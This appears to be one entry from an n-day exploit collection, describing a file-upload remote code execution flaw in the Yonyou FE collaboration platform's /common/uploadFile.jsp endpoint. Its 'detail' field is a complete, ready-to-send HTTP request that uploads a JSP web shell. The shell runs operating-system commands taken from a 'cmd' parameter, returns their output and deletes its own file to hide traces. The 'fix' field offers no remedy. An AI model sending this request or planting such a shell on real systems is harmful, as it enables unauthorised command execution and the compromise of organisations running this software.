vendor = "用友"
name = "用友FE协同平台存在文件上传"
type = "RCE"
version = "未知"
path = "/common/uploadFile.jsp"
detail = "POST /common/uploadFile.jsp?action=save&savePath=/images/upload/&fileName=123.jpg&title1=%C9%CF%B4%AB%CE%C4%BC%FE&title2=%D1%A1%D4%F1%CE%C4%BC%FE&allowsize=null&extName=.jsp HTTP/1.1Host: target.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.1018.84 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary123456789 ------WebKitFormBoundary123456789Content-Disposition: form-data; name=\"accessory\"; filename=\"123.jsp\"Content-Type: application/octet-stream <%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();int a = -1;byte[] b = new byte[2048];while((a=in.read(b))!=-1){out.println(new String(b));}new java.io.File(application.getRealPath(request.getServletPath())).delete();%>------WebKitFormBoundary123456789--"
fix = "老洞，有人当新洞发"
date = "0705"
label = "nday"
verifier = "AdySec"
